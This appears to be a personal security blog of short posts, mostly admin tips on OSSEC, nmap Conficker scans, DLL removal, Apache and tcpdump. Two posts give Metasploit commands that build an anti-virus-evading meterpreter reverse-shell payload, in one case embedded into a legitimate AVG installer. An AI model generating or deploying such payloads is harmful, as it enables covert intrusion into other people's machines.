moomba's blog

Msfencode to bypass anti-virus

My little research found only two anti-virus solutions worth having to detect or protect you against Metasploit payloads and the like: Sophos and Microsoft Security Essentials were the only engines that caught this type of attack. On some of the uploads to VirusTotal, DrWeb also flagged the file as malicious.

So here is what I typed on my Ubuntu system. You have to have Metasploit installed.

windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=9090 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -o bad.exe

Spotting Conficker via Nmap

I grabbed this from the Insecure.org website. I wanted to post it on my site in case they ever decide to remove the content. Here is how you scan for Conficker.

nmap -PN -T4 -p139,445 -n -v --script smb-check-vulns,smb-os-discovery --script-args safe=1 [targetnetworks]

I am using this in grepable format so I can easily grep out the infected machines.

nmap -PN -T4 -p139,445 -n -v --script smb-check-vulns,smb-os-discovery --script-args=unsafe=1 192.168.0.0/21 -oG 0-7.nets

The unsafe=1 argument makes smb-check-vulns actively test whether the host is vulnerable to MS08-067 (the netapi hole Conficker spreads through). That active check can crash the target's Server service, which is why the safe=1 form above runs only the non-intrusive checks.

Metasploit Tutorial 1

This tutorial is for educational purposes only. I know there are a lot of good tutorials out there, but I am creating my own as a quick reference. Irongeek.com and offensive-security.com have some great video tutorials. This is just a quick reference using meterpreter.

windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8888 R | msfencode -x /home/kod/avg_free_stb_all_9_114_cnet.exe  -t exe -e x86/shikata_ga_nai -c 10 -o evilfile.exe


Simple Bash Script for obtaining IP addresses from computer names

Situation: a user gave me computer names, but I need the IP addresses for over 300 machines so I can scan them.

Finished result below
*******************************
#!/bin/bash
var="-c 1"
# Resolve each computer name (first column of domainnames.txt) with a single ping and keep the address from the header line
while read -r host _; do
    ping $var "$host" | grep data | awk '{print $3}' | tr -d '():' >> ipsout.txt
done < domainnames.txt
**************************************************
Explanation Below

The -c 1 gets you a single ping when running in a Linux environment or from Cygwin on Windows.

Using OSSEC for HIPS solution

OSSEC is a Host-based Intrusion Detection System (HIDS); however, when using it together with iptables I have been able to make it behave like a Host-based Intrusion Prevention System (HIPS). When a foreign address scans my server, OSSEC detects it and adds the IP address to iptables for a period of time. When no more scan activity is seen, the address is removed from the table and that foreign host is allowed to communicate with the server again. I like this method; however, you have to be careful not to cause your own denial of service with it.

How to remove a dll like ddnsfilter.dll

First, it is handy (but not necessary) to have PsTools installed.

Bring up a command shell -> Start -> Run -> cmd

type> tasklist /m ddnsfilter.dll

or
C:\WINDOWS\system32>tasklist /m ddns*

Image Name PID Modules
========================= ====== =============================================
svchost.exe 1548 ddnsfilter.dll

Second, find the path of the file in Windows Explorer so you can select and delete it after killing process ID (PID) 1548. Note that svchost.exe hosts several services at once, so killing this PID also stops the other services running in that instance.
Now, if you have PsTools:

>pskill 1548
or
>taskkill /PID 1548 /F

How to spot bad dll files in the Windows/system32 file structure

First, make sure you can view all files by going to Tools > Folder Options > View and selecting "Show hidden files and folders".

Apache VirtualHost tip

I found this out the hard way: when you create your virtual host and want to bind it to a specific IP address on your network for security purposes, use a name rather than the address itself. When you later move to another box you can copy your config unchanged and just update the name's address in /etc/hosts.

i.e.
httpd.conf file:
<VirtualHost webserver:80>

/etc/hosts

10.2.2.1 webserver

Using awk with tcpdump

Say you want to monitor traffic but eliminate your own chatty connection traffic, so you want to exclude, say, ssh and/or tcp-3389. Note that the awk patterns match the digits anywhere in the line, so a pattern like /22/ also discards lines whose addresses or timestamps happen to contain 22.

tcpdump -i {interface} -s {packet size} host {host} | awk '!/port1/&&!/port2/'

  #tcpdump -i eth0 -s0 host 10.10.10.10 |awk '!/22/&&!/3389/' 

Also try this - Notice the difference in the awk piece.


A list of spam networks to block in Drupal if your website is US-based only.

If your website users are only US-based, you can use this list to help block users who use the XRumer software to create dummy user accounts on your system.
How to block malicious / spam networks with Drupal